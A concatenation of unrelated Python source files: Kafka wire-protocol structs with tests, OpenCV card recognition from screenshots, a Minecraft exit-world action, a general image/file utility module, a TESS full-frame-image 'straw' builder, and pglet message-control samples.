# coding: utf8 from kafkaka.bstruct import ( Struct, ShortField, IntField, CharField, UnsignedCharField, LongLongField, UnsignedIntField, Crc32Field, ) class KafkaProtocol(object): PRODUCE_KEY = 0 FETCH_KEY = 1 OFFSET_KEY = 2 METADATA_KEY = 3 OFFSET_COMMIT_KEY = 8 OFFSET_FETCH_KEY = 9 CLIENT_ID = 'kafkaka' class HeadStruct(Struct): api_key = ShortField() api_version = ShortField(default=0) correlation_id = IntField() client_id_length = ShortField(default=len(KafkaProtocol.CLIENT_ID)) client_id = CharField(default=KafkaProtocol.CLIENT_ID, length='client_id_length') class MetaTopicStruct(Struct): topic_name_length = ShortField() topic_name = CharField(length='topic_name_length') class MetaStruct(Struct): head = HeadStruct(api_key=KafkaProtocol.METADATA_KEY) topic_length = IntField(default=0) topics = MetaTopicStruct(repeat='topic_length') class BrokerStruct(Struct): node_id = IntField() host_char_len = ShortField() host = CharField(length='host_char_len') port = IntField() class PartitionStruct(Struct): error = ShortField() partition = IntField() leader = IntField() replicas_number = IntField() replicas = IntField(repeat='replicas_number') isr_number = IntField() isr = IntField(repeat='isr_number') class TopicStruct(Struct): error = ShortField() topic_name_length = ShortField() topic_name = CharField(length='topic_name_length') partitions_number = IntField() partitions = PartitionStruct(repeat='partitions_number') class MetaResponseStruct(Struct): correlation_id = IntField() brokers_number = IntField() brokers = BrokerStruct(repeat='brokers_number') topics_number = IntField() topics = TopicStruct(repeat='topics_number') class MessageStruct(Struct): magic = UnsignedCharField(default=0) attributes = UnsignedCharField(default=0) key = IntField(default=-1) value_length = IntField() value = CharField(length='value_length') class Crc32MessageStruct(Struct): crc = Crc32Field(source='message') message = MessageStruct() class Crc32MessageStructWithLength(Struct): unknown = LongLongField(default=0) message_length = IntField(source='message') message = Crc32MessageStruct() class MessageSetStruct(Struct): partition = IntField() message_set_length = IntField(source='message_set') message_set = Crc32MessageStructWithLength(repeat='message_set_length') class ProducePayloadStruct(Struct): topic_name_length = ShortField() topic_name = CharField(length='topic_name_length') topic_payloads_number = IntField() topic_payloads = MessageSetStruct(repeat='topic_payloads_number') class ProduceStruct(Struct): head = HeadStruct(KafkaProtocol.PRODUCE_KEY, 0) acks = ShortField(default=1) timeout = IntField(default=1000) payloads_number = IntField() payloads = ProducePayloadStruct(repeat='payloads_number') class ResponsePartitionStruct(Struct): partition = IntField() error = ShortField() offset = LongLongField() class ResponseTopicStruct(Struct): topic_name_length = ShortField() topic_name = CharField(length='topic_name_length') partitions_number = IntField() partitions = ResponsePartitionStruct(repeat='partitions_number') class ProduceResponseStruct(Struct): correlation_id = IntField() topics_number = IntField() topics = ResponseTopicStruct(repeat='topics_number') if __name__ == "__main__": s = HeadStruct( KafkaProtocol.METADATA_KEY, 0, 111, ) print s.pack2bin() s2 = HeadStruct( KafkaProtocol.METADATA_KEY, 0, 112, client_id='ok' ) print s2.pack2bin() m1 = MetaStruct( head=dict(correlation_id=111) ) print m1.dump2nametuple() print m1.pack2bin() print m1._values m2 = MetaStruct( head=dict(correlation_id=222) ) print m2.pack2bin() binary = m1.pack2bin() m3 = MetaStruct() print 'unpack' m3.unpack(binary) print m3.pack2bin() print m3.dump2nametuple() msg = MessageStruct( value='test' ) print (msg.dump2nametuple(), msg.pack2bin()) crc_msg = Crc32MessageStruct( message=dict( value='test' ) ) assert crc_msg.pack2bin() == 'Y*G\x87\x00\x00\xff\xff\xff\xff\x00\x00\x00\x04test' crc_msg_with_length = Crc32MessageStructWithLength( message=dict( message=dict( value='test' ) ) ) assert crc_msg_with_length.pack2bin() == '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x12Y*G\x87\x00\x00\xff\xff\xff\xff\x00\x00\x00\x04test' msg_set = MessageSetStruct( partition=1, message_set=[ dict( message=dict( message=dict( value='test' ) ) ), ] ) msg_set.pack2bin() produce_msg = ProduceStruct( head = dict(correlation_id=1), payloads=[ dict( topic_name='im-msg', topic_payloads=[ dict( partition=0, message_set=[ dict( message=dict( message=dict( value='test' ) ) ), ] ), ], ), ] ) assert produce_msg.pack2bin() == '\x00\x00\x00\x00\x00\x00\x00\x01\x00\x07kafkaka\x00\x01\x00\x00\x03\xe8\x00\x00\x00\x01\x00\x06im-msg\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x12Y*G\x87\x00\x00\xff\xff\xff\xff\x00\x00\x00\x04test' out = ProduceStruct() out.unpack(produce_msg.pack2bin()) print out.dump2nametuple() assert out.dump2nametuple().payloads[0].topic_name == 'im-msg' # test msgpack import msgpack p = msgpack.packb({'msg': 'hi', 'type': 4, 'dna': 470}) print [p] print [ProduceStruct( head = dict(correlation_id=1), payloads=[ dict( topic_name='im-msg', topic_payloads=[ dict( partition=0, message_set=[ dict( message=dict( message=dict( value=p ) ) ), ] ), ], ), ] ).pack2bin()]
import os, os.path import cv2 import numpy as np from config import cards, colors #card list, color names #from config import not_a_card #returns color -> green/red/black/blue #checks color settings in config.py/colors{} def color(img): rgb = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) #change bgr image to rgb red = np.array([202,16,16]) green = np.array([39,132,8]) black = np.array([0,0,0]) blue = np.array([8,8,238]) color = "" for i in rgb: for j in i: if (j == green).all(): color = "Green" return colors[color] if (j == red).all(): color = "Red" return colors[color] if (j == black ).all(): color = "Black" return colors[color] if (j == blue).all(): color = "Blue" return colors[color] return "0" #takes grayscale image and returns it black and white [(0,0,0) or (255,255,255)] pixels only #this is very important to makes sure that close images have equal sums and let recude card list #so it reduces numbers of operations def black_white(pic): for row in range(len(pic)): for pixel in range(len(pic[row])): if pic[row,pixel] != 0: pic[row,pixel] = 255 return pic #When you take a card, you need to convert it to GtayScale #Then you need to reverse GrayScale (to make sum lower much) #Then you change it to black and white (all non 0 pixels set to 255) and count sum #Then you feed this function with sum_blackwhite (int) and blackwhite(cv2 numpy array - picture) #Finally it returns value of card (defined in config.py) def card_value(sum_blackwhite, blackwhite): card_checked = "0" if str(sum_blackwhite) in cards: card_checked = cards[str(sum_blackwhite)] #sums 6 and 9 are equal so they have the same sum. If pixel [row4:col4] is black it's a nine! if cards[str(sum_blackwhite)] == "6": if (blackwhite[4,4] == [0,0,0]).all(): card_checked = "9" #same problem with ace and 3 (seems to only happen in hand) if cards[str(sum_blackwhite)] == "3": if (blackwhite[13,4] == [0,0,0]).all(): card_checked = "A" return card_checked else: #This one can be useful #cv2.imwrite("cards_to_add\\%i.png" % sum_blackwhite, blackwhite) return "0" def card_info(card): #convert card to numpy array card_np = np.array(card) #cv2 works on BGR, not RGB img_color = cv2.cvtColor(card_np, cv2.COLOR_RGB2BGR) #GRAYSCALE for checking card value img_gray = cv2.cvtColor(card_np, cv2.COLOR_BGR2GRAY) #reverse grayscale for smaller sum of pixels img_gray_reversed = cv2.bitwise_not(img_gray) #change reversed grayscale image to black and white #reversed to make sum smaller (0,0,0) < (255,255,255) blackwhite = black_white(img_gray_reversed) #sum of black white image, this is used to check value of card sum_blackwhite = blackwhite.sum() #Check value value = card_value(sum_blackwhite, blackwhite) #Check color info = color(img_color) + value #return color+value return info from screenshot import screenshot from config import not_a_card def grab_card_info(card_screenshots, skip=not_a_card): cards_boards_all = ["", "", "", "", ""] for each_card,i in zip(card_screenshots, range(5)): current_card = card_info(each_card) if current_card not in skip: cards_boards_all[i] = current_card return cards_boards_all
import logging from src.services.actions.base_action import BaseAction from src.services.actions.mixins.pause_menu_mixin_post_1_14 import PauseMenuMixinPost_1_14 logger = logging.getLogger(__name__) class ExitWorldPost_1_14(BaseAction, PauseMenuMixinPost_1_14): def perform(self) -> None: logger.info("Exiting world") self.pause_game() self.save_and_quit_to_title()
import os import re import cv2 import ast import sys import json import time import shutil import pickle import argparse import traceback import numpy as np from glob import glob from tqdm import tqdm import subprocess as sp from os.path import join from pathlib import Path from os.path import exists from os.path import dirname from os.path import basename from itertools import groupby from itertools import zip_longest from itertools import permutations from itertools import combinations from collections import OrderedDict from collections import defaultdict from datetime import datetime as dt try: import yaml except: pass try: from matplotlib import pyplot as plt except: pass try: import dlib except: pass try: from PIL import Image except: pass try: import pandas as pd pd.set_option('display.max_rows', None) pd.set_option('display.width', None) pd.set_option('display.max_colwidth', None) except: pass np.set_printoptions(threshold=sys.maxsize, linewidth=sys.maxsize, formatter={'float': lambda x: "{0:8.3f}".format(x)}) class DotDict(dict): def __init__(self, datas=None): super().__init__() if isinstance(datas, argparse.Namespace): datas = vars(datas) datas = dict() if datas is None else datas for k, v in datas.items(): self[k] = v def __getattr__(self, key): if key not in self: print("56 __getattr__ pixCommon key: ", key) raise AttributeError(key) else: return self[key] def __setattr__(self, key, val): self[key] = val def __repr__(self): keys = list(self.keys()) nSpace = len(max(keys, key=lambda x: len(x))) + 2 keys = sorted(keys) data = [f'{key:{nSpace}}: {self[key]},' for key in keys] data = '{\n%s\n}' % '\n'.join(data) return data def copy(self): return DotDict(super().copy()) def toJson(self): res = OrderedDict() for k, v in self.items(): try: json.dumps({k: v}) res[k] = v except: res[k] = str(v) return json.dumps(res) def toDict(self): res = OrderedDict() for k, v in self.items(): try: json.dumps({k: v}) res[k] = v except: res[k] = str(v) return res def str2bool(v): if isinstance(v, bool): return v if v.lower() in ('yes', 'true', 't', 'y', '1'): return True elif v.lower() in ('no', 'false', 'f', 'n', '0'): return False else: raise argparse.ArgumentTypeError('Boolean value expected.') def readYaml(src, defaultDict=None): if os.path.exists(src) or defaultDict is None: with open(src, 'r') as book: data = yaml.safe_load(book) else: data = defaultDict return DotDict(data) def writeYaml(yamlPath, jObjs): with open(yamlPath, 'w') as book: yaml.dump(yaml.safe_load(jObjs), book, default_flow_style=False, sort_keys=False) def readPkl(pklPath, defaultData=None): if not os.path.exists(pklPath): print("loading pklPath: ", pklPath) return defaultData return pickle.load(open(pklPath, 'rb')) def writePkl(pklPath, objs): pickle.dump(objs, open(dirop(pklPath), 'wb')) def dir2(var): ''' list all the methods and attributes present in object ''' for v in dir(var): print(v) print("34 dir2 common : ", ); quit() # def checkAttr(obj, b, getAttr=False): # a = set(vars(obj).keys()) # if getAttr: # print(a) # extra = a - a.intersection(b) # if len(extra): # raise Exception(extra) def bboxLabel(img, txt="", loc=(30, 30), color=(255, 255, 255), thickness=3, txtSize=1, txtFont=cv2.QT_FONT_NORMAL, txtThickness=3, txtColor=None): if len(loc) == 4: x0, y0, w, h = loc x0, y0, rw, rh = int(x0), int(y0), int(w), int(h) cv2.rectangle(img, (x0, y0), (x0 + rw, y0 + rh), list(color), thickness) else: x0, y0, rw, rh = int(loc[0]), int(loc[1]), 0, 0 txt = str(txt) if txt != "": if txtColor is None: txtColor = (0, 0, 0) (w, h), baseLine = cv2.getTextSize(txt, txtFont, txtSize, txtThickness) # baseLine -> to fit char like p,y in box cv2.rectangle(img, (x0, y0 + rh), (x0 + w, y0 + rh - h - baseLine), color, -1) cv2.putText(img, txt, (x0, y0 + rh - baseLine), txtFont, txtSize, txtColor, txtThickness, cv2.LINE_AA) return img def drawText(img, txt, loc, color=(255, 255, 255), txtSize=1, txtFont=cv2.FONT_HERSHEY_SIMPLEX, txtThickness=3, txtColor=None): (w, h), baseLine = cv2.getTextSize(txt, txtFont, txtSize, txtThickness) x0, y0 = int(loc[0]), int(loc[1]) if txtColor is None: txtColor = (0, 0, 0) cv2.rectangle(img, (x0, y0), (x0 + w, y0 - h - baseLine), color, -1) cv2.putText(img, txt, (x0, y0 - baseLine), txtFont, txtSize, txtColor, txtThickness) return img def putSubImg(mainImg, subImg, loc, interpolation=cv2.INTER_CUBIC): ''' place the sub image inside the genFrame image ''' if len(loc) == 2: x, y = int(loc[0]), int(loc[1]) h, w = subImg.shape[:2] else: x, y, w, h = int(loc[0]), int(loc[1]), int(loc[2]), int(loc[3]) subImg = cv2.resize(subImg, (w, h), interpolation=interpolation) x, y, w, h = frameFit(mainImg, (x, y, w, h)) mainImg[y:y + h, x:x + w] = getSubImg(subImg, (0, 0, w, h)) return mainImg def getSubImg(im1, bbox): ''' crop sub image from the given input image and bbox ''' x, y, w, h = bbox x, y, w, h = int(x), int(y), int(w), int(h) img = im1[y:y + h, x:x + w] if img.shape[0] and img.shape[1]: return img def maskIt(roi, roiMask): ''' apply mask on the image. It can accept both gray and colors image ''' if len(roi.shape) == 3 and len(roiMask.shape) == 2: roiMask = cv2.cvtColor(roiMask, cv2.COLOR_GRAY2BGR) elif len(roi.shape) == 2 and len(roiMask.shape) == 3: roiMask = cv2.cvtColor(roiMask, cv2.COLOR_BGR2GRAY) return cv2.bitwise_and(roi, roiMask) def imResize(img, sizeRC=None, scaleRC=None, interpolation=cv2.INTER_LINEAR): if sizeRC is not None: r, c = sizeRC[:2] else: try: dr, dc = scaleRC except: dr, dc = scaleRC, scaleRC r, c = img.shape[:2] r, c = r * dr, c * dc if interpolation == 'aa': img = np.array(Image.fromarray(img).resize((int(c), int(r)), Image.ANTIALIAS)) else: img = cv2.resize(img, (int(c), int(r)), interpolation=interpolation) return img def imHconcat(imgs, sizeRC, interpolation=cv2.INTER_LINEAR): rh, rw = sizeRC[:2] res = [] for queryImg in imgs: qh, qw = queryImg.shape[:2] queryImg = cv2.resize(queryImg, (int(rw * qw / qh), int(rh)), interpolation=interpolation) res.append(queryImg) return cv2.hconcat(res) def imVconcat(imgs, sizeRC, interpolation=cv2.INTER_LINEAR): rh, rw = sizeRC[:2] res = [] for queryImg in imgs: qh, qw = queryImg.shape[:2] queryImg = cv2.resize(queryImg, (int(rw), int(rh * qh / qw)), interpolation=interpolation) res.append(queryImg) return cv2.vconcat(res) class VideoWrtier: """mjpg xvid mp4v""" def __init__(self, path, camFps, size=None, codec='mp4v'): self.path = path try: self.fps = camFps.get(cv2.CAP_PROP_FPS) except: self.fps = camFps self.__vWriter = None self.__size = size self.__codec = cv2.VideoWriter_fourcc(*(codec.upper())) print("writing :", path, '@', self.fps, 'fps') def write(self, img): if self.__vWriter is None: if self.__size is None: self.__size = tuple(img.shape[:2]) self.__vWriter = cv2.VideoWriter(self.path, self.__codec, self.fps, self.__size[::-1]) if tuple(img.shape[:2]) != self.__size: img = cv2.resize(img, self.__size) if len(img.shape) == 2: img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR) self.__vWriter.write(img) def close(self): self.__vWriter.release() class clk: def __init__(self): self.tik = dt.now() self.__lapse = 0 def tok(self, reset=True): lapse = dt.now() - self.tik self.__lapse = lapse.seconds + (lapse.microseconds / 1000000) if reset: self.tik = dt.now() return self def fps(self, nFrames, roundBy=4): lapse = nFrames / self.__lapse # self.__lapse = 0 return round(lapse, roundBy) if roundBy else int(lapse) def __repr__(self): lapse = self.__lapse # self.__lapse = 0 return str(round(lapse, 4)) def sec(self, roundBy=4): lapse = self.__lapse # self.__lapse = 0 return round(lapse, roundBy) if roundBy else int(lapse) # class Clock: # def __init__(self): # self.__lapse = 0 # self.__tik = dt.now() # self.__cycle = 0 # # def tik(self): # self.__tik = dt.now() # # def tok(self, reset=True): # lapse = dt.now() - self.__tik # lapse = lapse.seconds + (lapse.microseconds / 1000000) # self.__lapse += lapse # self.__cycle += 1 # return f'{round(lapse, 4)} {self.__cycle}' # # def __repr__(self): # lapse = self.__lapse / self.__cycle # return f'{round(lapse, 4)} {round(1 / lapse, 4)}' class Wait: def __init__(self): self.pause = False def __call__(self, delay=1): if self.pause: delay = 0 key = cv2.waitKey(delay) if key == 32: self.pause = True if key == 13: self.pause = False return key __wait = Wait() def showImg(winname='output', imC=None, delay=None, windowConfig=0, nRow=None, chFirst=False): winname = str(winname) if imC is not None: if type(imC) is not list: imC = [imC] imC = photoframe(imC, nRow=nRow, chFirst=chFirst) cv2.namedWindow(winname, windowConfig) cv2.imshow(winname, imC) if delay is not None: key = __wait(delay) return key return imC def pshowImg(winname=None, imC=None, delay=0): winname = str(winname) if imC is not None: if type(imC) is list: pass plt.imshow(imC) if delay is not None: if delay == 0: plt.show() # else: # plt.pause(delay / 1000) return 1 return imC def str2path(*dirpath): dirpath = list(map(str, dirpath)) path = join(*dirpath) if path.startswith('home/ec2-user'): path = join('/', path) return path def moveCopy(src, des, op, isFile, remove): des = str2path(des) if isFile and not os.path.splitext(des)[-1]: raise Exception(f'''Fail des: {des} should be file''') if not remove and exists(des): raise Exception(f'''Fail des: {des} already exists delete it before operation''') if isFile: if remove and exists(des): os.remove(des) mkpath = dirname(des) if not exists(mkpath): os.makedirs(mkpath) else: if remove and exists(des): shutil.rmtree(des, ignore_errors=True) return op(src, des) def dirop(*dirpath, **kw): mkdir, remove, mode = kw.get('mkdir', True), kw.get('remove'), kw.get('mode', 0o777) copyTo, moveTo = kw.get('copyTo'), kw.get('moveTo') path = str2path(*dirpath) isFile = os.path.splitext(path)[-1] if copyTo or moveTo: if not exists(path): raise Exception(f'''Fail src: {path} not found''') elif remove is True and exists(path): if isFile: os.remove(path) else: shutil.rmtree(path, ignore_errors=True) mkpath = dirname(path) if isFile else path if mkdir and not exists(mkpath) and mkpath: os.makedirs(mkpath) if copyTo: copy = shutil.copy if isFile else shutil.copytree path = moveCopy(path, copyTo, copy, isFile, remove=remove) elif moveTo: path = moveCopy(path, moveTo, shutil.move, isFile, remove=remove) return path def downloadDB(link, des, remove=False): dirop(des) os.system(f'cd {des};wget -nd -c "{link}"') unzipIt(join(des, basename(link)), des, remove=remove) def zipIt(src, desZip, remove=False): if not exists(src): raise Exception(f'''Fail src: {src} \n\tnot found''') if exists(desZip): if remove: os.remove(desZip) else: raise Exception(f'''Fail des: {desZip} \n\talready exists delete it before operation''') desZip, zipExt = os.path.splitext(desZip) if os.path.isfile(src): tempDir = join(dirname(src), getTimeStamp()) if os.path.exists(tempDir): raise Exception(f'''Fail tempDir: {tempDir} \n\talready exists delete it before operation''') os.makedirs(tempDir) shutil.copy(src, tempDir) desZip = shutil.make_archive(desZip, zipExt[1:], tempDir) shutil.rmtree(tempDir, ignore_errors=True) else: desZip = shutil.make_archive(desZip, zipExt[1:], src) return desZip def unzipIt(src, desDir, remove=False): if not exists(src): raise Exception(f'''Fail src: {src} \n\tnot found''') if os.path.splitext(desDir)[-1]: raise Exception(f'''Fail desDir: {desDir} \n\tshould be folder''') tempDir = join(dirname(desDir), getTimeStamp()) shutil.unpack_archive(src, tempDir) if not exists(desDir): os.makedirs(desDir) for mvSrc in os.listdir(tempDir): mvSrc = join(tempDir, mvSrc) mvDes = join(desDir, basename(mvSrc)) if remove is True and exists(mvDes): if os.path.isfile(mvDes): os.remove(mvDes) else: shutil.rmtree(mvDes, ignore_errors=True) try: shutil.move(mvSrc, desDir) except Exception as exp: shutil.rmtree(tempDir, ignore_errors=True) raise Exception(exp) shutil.rmtree(tempDir, ignore_errors=True) return desDir # def float2img(img, pixmin=0, pixmax=255, dtype=0): # ''' # convert oldFeature to (0 to 255) range # ''' # return cv2.normalize(img, None, pixmin, pixmax, 32, dtype) def float2img(img, min=None, max=None): min = img.min() if min is None else min max = img.max() if max is None else max img = img.astype('f4') img -= min img /= max return (255 * img).astype('u1') def photoframe(imgs, rcsize=None, nRow=None, resize_method=cv2.INTER_LINEAR, fit=False, asgray=False, chFirst=False): ''' # This method pack the array of images in a visually pleasing manner. # If the nCol is not specified then the nRow and nCol are equally divided # This method can automatically pack images of different size. Default stitch size is 128,128 # when fit is True final photo frame size will be rcsize # is False individual image size will be rcsize # Examples # -------- video = Player(GetFeed(join(dbpath, 'videos', r'remove_rain.mp4')), custom_fn=None) for fnos, imgs in video.chunk(4): i1 = photoframe(imgs, nCol=None) i2 = photoframe(imgs, nCol=4) i3 = photoframe(imgs, nCol=4, rcsize=(200,300),nimgs=7) i4 = photoframe(imgs, nCol=3, nimgs=7) i5 = photoframe(imgs, nCol=4, rcsize=imgs[0].shape) i6 = photoframe(imgs, nCol=6, rcsize=imgs[0].shape, fit=True) i7 = photoframe(imgs, nCol=4, rcsize=imgs[0].shape, fit=True, asgray=True) for i, oldFeature in enumerate([i1, i2, i3, i4, i5, i6, i7], 1): print(i, oldFeature.shape) win('i%s' % i, )(oldFeature) win('totoal')(photoframe([i1, i2, i3, i4, i5, i6, i7])) if win().__wait(waittime) == 'esc': break ''' if len(imgs): if chFirst: imgs = np.array([np.transpose(img, [1, 2, 0]) for img in imgs]) if rcsize is None: rcsize = imgs[0].shape imrow, imcol = rcsize[:2] # fetch first two vals nimgs = len(imgs) nRow = int(np.ceil(nimgs ** .5)) if nRow is None else int(nRow) nCol = nimgs / nRow nCol = int(np.ceil(nCol + 1)) if (nRow * nCol) - nimgs else int(np.ceil(nCol)) if fit: imrow /= nRow imcol /= nCol imrow, imcol = int(imrow), int(imcol) resshape = (imrow, imcol) if asgray else (imrow, imcol, 3) imgs = zip_longest(list(range(nRow * nCol)), imgs, fillvalue=np.zeros(resshape, imgs[0].dtype)) resimg = [] for i, imggroup in groupby(imgs, lambda k: k[0] // nCol): rowimg = [] for i, img in imggroup: if img.dtype != np.uint8: img = float2img(img) if asgray: if len(img.shape) == 3: img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) elif len(img.shape) == 2: img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR) elif img.shape[-1] == 1: img = img.reshape(*img.shape[:2]) img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR) if tuple(img.shape) != resshape: img = cv2.resize(img, (imcol, imrow), interpolation=resize_method) rowimg.append(img) resimg.append(cv2.hconcat(rowimg)) return cv2.vconcat(resimg) def getTimeStamp(): return dt.now().strftime("%d%b%H%M%S_%f") def replaces(path, *words): path = str(path) for word in words: path = path.replace(*word) return path
# -*- coding: utf-8 -*- # Copyright 2017-2018 Orbital Insight Inc., all rights reserved. # Contains confidential and trade secret information. # Government Users: Commercial Computer Software - Use governed by # terms of Orbital Insight commercial license agreement. """ Created on Fri Aug 16 19:25:37 2019 TODO x Save metadata to output directory x Function to read metadata x Load straws should figure out if its searching on s3 x Straw names should include sector x Docstrings x Investigate async to speed writing the straws x Add more info to metadata file o Straw maker may not deal with edges of the ccd correctly o Is npy the best format for writing straws? x Do I need to save a time file? @author: fergal Concepts ----------- FFI Full Frame Image. A single image from a single camera/ccd taken by TESS. Typically, we only want a small postage stamp from each FFI, but we want that postage stamp for many FFIs Datacube A 3d numpy array, where each row is an image. Straw A datacube consisting of a small postage stamp image from each an every FFI in a sector. Camera, CCD, col, row This 4-tuple uniquely identifies a pixel on the TESS focal plane. This module contains a class to collect all the imagery from a set of FFIs, and create straws that tile the entire viewing area, then another class to construct a datacube from those tiles. This serves the use case where you want to get all the imagery across all FFIs for a single star. By dividing up the data this way we can minimise the time spent on reading files, and downloading data. As such it is an excellent approach for accessing data on single stars from s3 using an AWS Lambda. """ from __future__ import print_function from __future__ import division from pdb import set_trace as debug import numpy as np import os import astropy.io.fits as pyfits from glob import glob import collections import datetime import inspect import json from common import METADATA_FILE from common import makeStrawName class MakeTessStraw(object): def __init__(self, ffiPath, outPath, sector, camera, ccd): """ Inputs ---------- ffiPath (str) Path to FFI files on local disk. This path can contain FFIs from mulitple ccds or cameras, but can only contain FFIs from a single sector. outPath (str) Location on local disk to store straws sector (int) sector number to process """ #The order these variables are defined should (not not definitely) #be reproduced in the json stored metadata. Hence a couple of #items are defined before their values are known. self.outPath = outPath self.ffiPath = ffiPath self.sector = sector self.camera = camera self.ccd = ccd self.nColsRows = None #See note above self.dataVersion = None self.strawSize = 50 self.midtimes_tbjd = None #Will be filled in later self.qualityFlags = None #The sector version string is part of the FFI filename sectorVersion= {1:120, 3:123} try: self.dataVersion = sectorVersion[sector] except IndexError: raise IndexError("sectorVersion string not hardcoded for this sector yet") #These must be set in this order self.datestampList = self.loadDatestamps() self.nColsRows = self.getFfiShape() self.do(camera, ccd) def loadDatestamps(self): """Load a list of datestamps from all the FFIs in `ffiPath` Look in the directory `self.ffiPath`, find all the FFI files, and extract their datestamps. It would be nice is those were also the observation times, but this is the SPOC, so they aren't. The datestamps are used for loading the right file from disk """ pattern = "tess*ffic.fits" pattern = os.path.join(self.ffiPath, pattern) fileList = glob(pattern) assert len(fileList) > 0 f = lambda x: os.path.split(x)[-1].split('-')[0][4:] datestamps = map( f, fileList) datestamps = sorted(list(set(datestamps))) assert len(datestamps) > 0 return datestamps def do(self, camera, ccd): nCols, nRows= self.nColsRows for i in range(0, nCols, self.strawSize): print("Processing column %i" %(i)) for j in range(0, nRows, self.strawSize): straw, times, flags = self.makeStraw(camera, ccd, i, j) self.writeStraw(straw, camera, ccd, i, j) #Convert times, flags to JSON serializable lists self.midtimes_tbjd = list(times) self.qualityFlags = list(map(int, flags)) self.saveMetadata() def getFfiShape(self): """Get the num cols and rows from the FFI header""" ffiName = self.getFfiName(0, self.camera, self.ccd) hdr = pyfits.getheader(ffiName, 1) nCols = hdr['NAXIS1'] nRows = hdr['NAXIS2'] return nCols, nRows def makeStraw(self, camera, ccd, col, row): """Make a straw at the requested location Inputs ------------- camera, ccd, col, row (int) Properties of the straw. col and row refer to coordinates of the bottom-left corner of the straw. Returns --------- np 3d array """ nCol, nRow = self.strawSize, self.strawSize nCadence = len(self.datestampList) straw = np.empty( (nCadence, nRow, nCol) ) midtimes_tbjd = np.empty(nCadence) flags = np.empty(nCadence, dtype=int) for i in range(nCadence): ffiName = self.getFfiName(i, camera, ccd) frame, time, flagValue = self.readFfiSection(ffiName, col, row) nr, nc = frame.shape straw[i,:nr,:nc] = frame midtimes_tbjd[i] = time flags[i] = flagValue return straw, midtimes_tbjd, flags def writeStraw(self, straw, camera, ccd, col, row): """ Write a straw to disk Inputs ----------- straw (3d npy array) The data to save camera, ccd, col, row (int) Properties of the straw. col and row refer to coordinates of the bottom-left corner of the straw. """ path, fn = makeStrawName(self.outPath, self.sector, camera, ccd, col, row) if not os.path.exists(path): os.makedirs(path) fn = os.path.join(path, fn) np.save(fn, straw) def readFfiSection(self, ffiName, col, row): """Read a postage stamp from an FFI file This is by far the most expensive function in the class and optimisation efforts should focus here """ hdulist = pyfits.open(ffiName, memmap=True) img = hdulist[1] slCol = slice(col, col + self.strawSize) slRow = slice(row, row + self.strawSize) data = img.section[slRow, slCol] tstart = img.header['TSTART'] tend = img.header['TSTOP'] midtime_tbjd = .5 * (tstart + tend) flag = img.header['DQUALITY'] hdulist.close() return data, midtime_tbjd, flag def getFfiName(self, cadenceNum, camera, ccd): """Construct the path to an FFI on local disk Raises an index error if `cadenceNum` is out of bounds on the list of FFIs available """ datestamp = self.datestampList[cadenceNum] fn = "tess%s-s%04i-%i-%i-%04i-s_ffic.fits" \ %(datestamp, self.sector, camera, ccd, self.dataVersion) return os.path.join(self.ffiPath, fn) def saveMetadata(self): """Save a metadata file to a local filestore """ fn = os.path.join(self.outPath, "sector%02i" %(self.sector), METADATA_FILE) frame = inspect.currentframe().f_back (filename, lineno, funcname, _, _) = inspect.getframeinfo(frame) params = collections.OrderedDict() params['__file__'] = filename params['__lineno__'] = lineno params['__date__'] = str(datetime.datetime.now()) params['__user__'] = os.environ['USER'] params.update(self.__dict__) text = json.dumps(params, indent=2) with open(fn, 'w') as fp: fp.write(text)
import pglet from pglet import Button, Message, MessageButton, Stack, Text def messages(): return Stack( width="70%", gap=20, controls=[ Text("Messages", size="xLarge"), Message(value="This is just a message."), Message( value="Success message with dismiss button", dismiss=True, type="success", ), Message( value="Error message with dismiss button", dismiss=True, type="error" ), Message( type="blocked", truncated=True, dismiss=True, value="Blocked Message - single line, with dismiss button and truncated text. Truncation is not available if you use action buttons or multiline and should be used sparingly. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Morbi luctus, purus a lobortis tristique, odio augue pharetra metus, ac placerat nunc mi nec dui. Vestibulum aliquam et nunc semper scelerisque. Curabitur vitae orci nec quam condimentum porttitor et sed lacus. Vivamus ac efficitur leo. Cras faucibus mauris libero, ac placerat erat euismod et. Donec pulvinar commodo odio sit amet faucibus. In hac habitasse platea dictumst. Duis eu ante commodo, condimentum nibh pellentesque, laoreet enim. Fusce massa lorem, ultrices eu mi a, fermentum suscipit magna. Integer porta purus pulvinar, hendrerit felis eget, condimentum mauris. You've been warned!", ), Message( type="warning", dismiss=True, value="Warning message with buttons", buttons=[ MessageButton(text="Yes", action="yes"), MessageButton(text="No", action="no"), ], ), Message( type="severeWarning", multiline=True, value="SevereWarning defaults to multiline. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Morbi luctus, purus a lobortis tristique, odio augue pharetra metus, ac placerat nunc mi nec dui. Vestibulum aliquam et nunc semper scelerisque. Curabitur vitae orci nec quam condimentum porttitor et sed lacus. Vivamus ac efficitur leo. Cras faucibus mauris libero, ac placerat erat euismod et. Donec pulvinar commodo odio sit amet faucibus. In hac habitasse platea dictumst. Duis eu ante commodo, condimentum nibh pellentesque, laoreet enim. Fusce massa lorem, ultrices eu mi a, fermentum suscipit magna. Integer porta purus pulvinar, hendrerit felis eget, condimentum mauris.", buttons=[MessageButton("OK"), MessageButton("Cancel")], ), message_with_on_dismiss(), message_with_on_dismiss_and_buttons(), ], ) def message_with_on_dismiss(): def message_dismissed(e): t.value = "Message dismissed!" stack.update() m = Message( value="Message with on_dismiss event", dismiss=True, on_dismiss=message_dismissed, ) t = Text() stack = Stack(controls=[m, t]) return stack def message_with_on_dismiss_and_buttons(): def message_dismissed(e): t.value = f"Message dismissed with {e.data} action" stack.update() m = Message( value="Message with dismiss event and buttons", dismiss=True, on_dismiss=message_dismissed, buttons=[MessageButton("OK"), MessageButton("Cancel")], ) t = Text() stack = Stack(controls=[m, t]) return stack def main(page): page.title = "Message control samples" page.horizontal_align = "stretch" page.update() page.add(messages()) pglet.app("python-message", target=main)
